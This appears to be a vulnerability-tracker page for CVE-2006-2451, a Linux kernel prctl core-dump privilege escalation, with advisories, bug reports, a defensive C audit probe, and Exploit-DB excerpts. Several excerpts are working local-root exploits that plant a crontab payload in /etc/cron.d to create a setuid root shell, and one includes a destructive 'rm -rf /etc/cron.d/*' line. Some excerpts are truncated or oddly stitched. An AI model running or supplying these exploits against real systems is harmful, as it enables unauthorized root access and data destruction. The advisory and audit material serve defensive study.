CVE-2006-2451
Published 2006-07-07
Priority: P4 · 21 · CVSS 2.0: 4.6 (medium) · AV:L/AC:L/Au:N/C:P/I:P/A:P
Exploit: yes (Exploit-DB entries below)
EPSS: 4.39% (90.1th percentile)
The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.
Affected
50 ranges listed (25 shown); the rendered rows carried no version data. The affected and fixed versions stated in the description are:
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | 2.6.13 up to (not including) 2.6.17.4 | 2.6.17.4 |
| linux | linux_kernel | 2.6.16 up to (not including) 2.6.16.24 | 2.6.16.24 |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 4.6 | MEDIUM | AV:L/AC:L/Au:N/C:P/I:P/A:P |
| vendor_ubuntu | — | 4.7 | MEDIUM | — |
| vendor_redhat | — | 4.6 | MEDIUM | — |
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2006-07-11 · CVSS 4.7 · listed under CVE-2006-0039 [MEDIUM]
A race condition was discovered in the do_add_counters() functions. Processes which do not run with full root privileges, but have the CAP_NET_ADMIN capability can exploit this to crash the machine or read a random piece of kernel memory. In Ubuntu there are no packages that are affected by this, so this can only be an issue for you if you use third-party software that uses Linux capabilities. (CVE-2006-0039)

John Stultz discovered a faulty BUG_ON trigger in the handling of POSIX timers. A local attacker could exploit this to trigger a kernel oops and crash the machine. (CVE-2006-2445)

Dave Jones discovered that the PowerPC kernel did not perform certain required access_ok() checks. A local user could exploit thi
Red Hat
Possible privilege escalation through prctl() and suid_dumpable
vendor_redhat · 2006-07-06 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
Description: same text as the NVD description above.
GHSA
GHSA-347h-x86q-mrvf: The suid_dumpable support in Linux kernel 2
ghsa_unreviewed · 2022-05-01 · CVE-2006-2451 [MEDIUM]
Description: same text as the NVD description above.
Kernel
fs: make dumpable=2 require fully qualified path
kernel_security · 2012-07-30 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
When the suid_dumpable sysctl is set to "2", and there is no core dump pipe defined in the core_pattern sysctl, a local user can cause core files to be written to root-writable directories, potentially with user-controlled content.

This means an admin can unknowingly reintroduce a variation of CVE-2006-2451, allowing local users to gain root privileges.
```text
$ cat /proc/sys/fs/suid_dumpable
2
$ cat /proc/sys/kernel/core_pattern
core
$ ulimit -c unlimited
$ cd /
$ ls -l core
ls: cannot access core: No such file or directory
$ touch core
touch: cannot touch `core': Permission denied
$ OHAI="evil-string-here" ping localhost >/dev/null 2>&1 &
$ pid=$!
$ sleep 1
$ kill -SEGV $pid
$ ls -l core
-rw------- 1 root kees 458752 Jun 21 11:35 core
$ sudo
```
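A local check for both conditions described above, written as an added example for this page (it is not code from the kernel commit, from the kernel tree, or from any of the Exploit-DB authors below). It asks the running kernel whether an unprivileged process can still set PR_SET_DUMPABLE to 2, which is the original CVE-2006-2451 condition and is answered with EINVAL on kernels carrying the 2.6.17.4 / 2.6.16.24 fix, and it applies the rule the 2012 commit enforces to a suid_dumpable value and a core_pattern string: with dumpable=2 the destination must be a pipe handler or an absolute path, otherwise a relative pattern such as "core" lands in whatever directory the unprivileged user chose as cwd. The function names, return codes and the sample sysctl values in the test are this example's own assumptions; it only runs on Linux.

```c
/* Added example for this page, not code from the kernel commit above or from
 * the Exploit-DB entries below. It probes the two conditions discussed here:
 *  1. the original CVE-2006-2451 bug: an unprivileged process can set
 *     PR_SET_DUMPABLE to 2 (rejected with EINVAL since 2.6.17.4 / 2.6.16.24);
 *  2. the sysctl variation the 2012 commit closes: suid_dumpable=2 with a
 *     core_pattern that is neither a pipe nor an absolute path.
 * Function names, return codes and the sample sysctl values are this
 * example's own assumptions. Linux only. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>

enum {
    DUMPABLE2_REJECTED    = 0,   /* EINVAL: fixed kernel */
    DUMPABLE2_ACCEPTED    = 1,   /* affected kernel */
    DUMPABLE2_PROBE_ERROR = -1   /* prctl failed for another reason */
};

/* Ask the running kernel whether PR_SET_DUMPABLE accepts the value 2.
 * The probe runs in the calling process and restores the previous flag, so
 * it does not leave the process in the "suidsafe" state the exploits used. */
int probe_prctl_dumpable2(void)
{
    int prev = prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
    if (prev < 0)
        return DUMPABLE2_PROBE_ERROR;

    if (prctl(PR_SET_DUMPABLE, 2, 0, 0, 0) == 0) {
        prctl(PR_SET_DUMPABLE, prev, 0, 0, 0);  /* put the flag back */
        return DUMPABLE2_ACCEPTED;
    }
    return errno == EINVAL ? DUMPABLE2_REJECTED : DUMPABLE2_PROBE_ERROR;
}

/* The rule enforced by "fs: make dumpable=2 require fully qualified path":
 * with suid_dumpable=2 the core file is written as root, so the pattern must
 * hand the dump to a pipe program ("|...") or name an absolute path. A
 * relative pattern such as "core" resolves in the crashing process's cwd,
 * which the unprivileged user picked (e.g. /etc/cron.d). Returns 1 when that
 * exposure exists, 0 otherwise. Mode 1 ("debug") is unsafe by design and is
 * outside this check. */
int dumpable2_exposure(int suid_dumpable, const char *core_pattern)
{
    if (suid_dumpable != 2)
        return 0;
    if (core_pattern[0] == '|' || core_pattern[0] == '/')
        return 0;
    return 1;
}

/* Read the first line of a /proc sysctl file without its newline. */
static int read_sysctl(const char *path, char *buf, size_t len)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    if (!fgets(buf, (int)len, f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}

/* Audit the live system. Returns 1 if neither exposure is present, 0 if one
 * is, -1 if the sysctls could not be read (non-Linux or no /proc). */
int audit_live_system(void)
{
    char dumpable[16], pattern[256];

    if (read_sysctl("/proc/sys/fs/suid_dumpable", dumpable, sizeof dumpable) < 0 ||
        read_sysctl("/proc/sys/kernel/core_pattern", pattern, sizeof pattern) < 0)
        return -1;

    int prctl_exposed  = probe_prctl_dumpable2() == DUMPABLE2_ACCEPTED;
    int sysctl_exposed = dumpable2_exposure(atoi(dumpable), pattern);

    printf("prctl(PR_SET_DUMPABLE, 2): %s\n",
           prctl_exposed ? "ACCEPTED (CVE-2006-2451)" : "rejected (fixed)");
    printf("suid_dumpable=%s core_pattern=\"%s\": %s\n", dumpable, pattern,
           sysctl_exposed ? "root-owned core in a user-chosen cwd is possible"
                          : "ok");
    return !(prctl_exposed || sysctl_exposed);
}

int main(void)
{
    return audit_live_system() == 1 ? 0 : 1;
}
```

Run it as an unprivileged user; exit status 0 means the kernel rejects dumpable=2 from userspace and the sysctl pair does not allow a root-owned core file in a user-chosen directory. Nothing in the probe creates a core file or touches /etc/cron.d.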
No detection rules found.
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation
exploitdb · 2006-07-18 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
```c
/*
 * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
 * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
 * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via
 * the PR_SET_DUMPABLE argument of the prctl function and a program that causes
 * a core dump file to be created in a directory for which the user does not
 * have permissions (CVE-2006-2451).
 *
 * This exploit uses the logrotate attack vector: of course, you must be able
 * to chdir() into the /etc/logrotate.d directory in order to exploit the
 * vulnerability. I've experimented a bit with other attack vectors as well,
 * with no luck: at (/var/spool/atjobs/) uses file name information to
 * establish execution time, /etc/cron.hourly|daily|weekly|
```
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (4)
exploitdb · 2006-07-14 · CVE-2006-2451
Linux Kernel 2.6.13 /tmp/getsuid.c
```sh
/* Header names were stripped during extraction; restored for the calls
 * the source below makes. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/resource.h>
/* Crontab fragment that ends up inside the root-owned core file; cron only
 * needs to find one well-formed line in /etc/cron.d/core. */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() {
    int child;
    struct rlimit corelimit;
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);   /* allow a core dump at all */
    if ( !( child = fork() )) {
        chdir("/etc/cron.d");             /* cwd is where "core" is written */
        prctl(PR_SET_DUMPABLE, 2);        /* the bug: value 2 accepted from an unprivileged process */
        sleep(200);
        exit(1);
    }
    kill(child, SIGSEGV);                 /* kernel writes /etc/cron.d/core as root */
    sleep(120);
}
__EOF__
cat > /tmp/s.c
#include <stdlib.h>
#include <unistd.h>
int main(void)
{
    setgid(0);
    setuid(0);
    system("/bin/sh");
    system("rm -rf /tmp/s");
    system("rm -rf /etc/cron.d/*");
    return 0;
}
__EOF__
echo "wait aprox 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsui
```
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)
exploitdb · 2006-07-13 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
```c
/*
 * The suid_dumpable support in Linux kernel 2.6.13 up to versions before
 * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial
 * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges
 * via the PR_SET_DUMPABLE argument of the prctl function and a program that
 * causes a core dump file to be created in a directory for which the user does
 * not have permissions (CVE-2006-2451).
 *
 * Berlin, Sunday July 9th 2006: WORLD CHAMPIONS! WORLD CHAMPIONS!
 * WORLD CHAMPIONS! ("CAMPIONI DEL MONDO!"; i was tempted to name this exploit "pajolo.c";))
 *
 * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug.
 *
 * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this
 * means that distributions that use a different c
```
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (2)
exploitdb · 2006-07-12 · CVE-2006-2451
```c
/* Linux Kernel 2.6.13 = 2.6.13 prctl kernel exploit
 *
 * (C) Julien TINNES
 *
 * If you read the Changelog from 2.6.13 you've probably seen:
 * [PATCH] setuid core dump
 *
 * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process,
 * user setable argument to PR_SET_DUMPABLE.
 *
 * This flaw allows us to create a root owned coredump into any directory.
 * This is trivially exploitable.
 *
 */
/* Header names were stripped during extraction (the original had ten
 * #include lines); restored for the calls the visible source makes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#define CROND "/etc/cron.d"
#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
/* crontab text that must survive inside the core file written to /etc/cron.d */
char crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * * root chown root:root %s &
```
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
exploitdb · 2006-07-11 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
```c
/* Linux Kernel 2.6.13 = 2.6.13 && (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
/* Header names were stripped during extraction; restored for the calls
 * the source makes (fork, setrlimit, prctl, kill, chdir, printf). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/resource.h>
/* crontab fragment carried into the root-owned core file in /etc/cron.d */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);   /* allow the child to dump core */
    printf("[*] Creating Cron entry\n");
    if ( !( child = fork()
```
Bugzilla
Various kernel security issues - July thru October 2006
bugzilla · 2006-07-24 · CVSS 4.9 · [MEDIUM]
This bug will track the various kernel issues up to July 2006.
Discussion:
*** Bug 188935 has been marked as a duplicate of this bug. ***
---
*** Bug 190082 has been marked as a duplicate of this bug. ***
---
*** Bug 190083 has been marked as a duplicate of this bug. ***
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Here are updated kernel packages to QA for FC3:

* Sun Jul 16 2006 Marc Deslauriers
2.6.12-2.4.legacy_FC3
- Added patches for:
CVE-2005-3359 (incorrect increment/decrement in atm module)
CVE-2006-0555 (nfs: fix client panic using O_DIRECT)
CVE-2006-0741 (fix for ELF exec vulnerability on EM64T)
CVE-2006-0744 (fix for ELF exec vulnerability on EM64T)
CVE-2006-1525 (panic in ip_route_input() via inet_rtm_getro
Bugzilla
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
bugzilla · 2006-07-15 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
I've just reproduced this issue under kernel-2.6.17-1.2145 on FC-5 and kernel-2.6.17-1.2364 on FC-6 - see bug 198893 for a nasty reproducer.

I suggest that we apply the patch to prevent processes with the PR_SET_DUMPABLE flag set from being able to dump core in whatever directory they can cd into, regardless of whether the userid has write permission, ASAP.
Discussion:
fixed in 2158 for FC5
fixed in rawhide too some time after 2364.
Bugzilla
CVE-2006-2451 Possible privilege escalation through prctl() and suid_dumpable
bugzilla · 2006-06-19 · CVSS 4.6 · CVE-2006-2451 [MEDIUM]
The prctl() function allows unprivileged processes to set the value 2 for PR_SET_DUMPABLE. In case of a segmentation fault the core dump will then be owned by the user root.

This could lead to a denial of service (disk consumption) or allow a local user to gain root privileges.

The suid_dumpable support and prctl(PR_SET_DUMPABLE, 2) have been added with the 2.6.13 kernel and Red Hat Enterprise Linux 4 contains a backport of it.
Discussion:
The patch for the stable kernel series of 2.6.17 can be found here:
http://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.17.y.git;a=commit;h=0af184bb9f80edfbb94de46cb52e9592e5a547b0
---
An advisory has been issued which should help the problem described in

References
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=195902
http://secunia.com/advisories/20953
http://secunia.com/advisories/20960
http://secunia.com/advisories/20965
http://secunia.com/advisories/20986
http://secunia.com/advisories/20991
http://secunia.com/advisories/21179
http://secunia.com/advisories/21498
http://secunia.com/advisories/21966
http://securitytracker.com/id?1016451
http://support.avaya.com/elmodocs2/security/ASA-2006-162.htm
http://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.17.y.git;a=commit;h=0af184bb9f80edfbb94de46cb52e9592e5a547b0
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.24
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.4
http://www.novell.com/linux/security/advisories/2006_16_sr.html
http://www.novell.com/linux/security/advisories/2006_17_sr.html
http://www.novell.com/linux/security/advisories/2006_42_kernel.html
http://www.novell.com/linux/security/advisories/2006_47_kernel.html
http://www.novell.com/linux/security/advisories/2006_49_kernel.html
http://www.osvdb.org/27030
http://www.redhat.com/support/errata/RHSA-2006-0574.html
http://www.securityfocus.com/archive/1/439483/100/100/threaded
http://www.securityfocus.com/archive/1/439610/100/100/threaded
http://www.securityfocus.com/archive/1/439869/100/0/threaded
http://www.securityfocus.com/archive/1/440057/100/0/threaded
http://www.securityfocus.com/archive/1/440117/100/0/threaded
http://www.securityfocus.com/archive/1/440118/100/0/threaded
http://www.securityfocus.com/archive/1/440379/100/0/threaded
http://www.securityfocus.com/bid/18874
http://www.ubuntu.com/usn/usn-311-1
http://www.vupen.com/english/advisories/2006/2699
https://issues.rpath.com/browse/RPL-488
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11336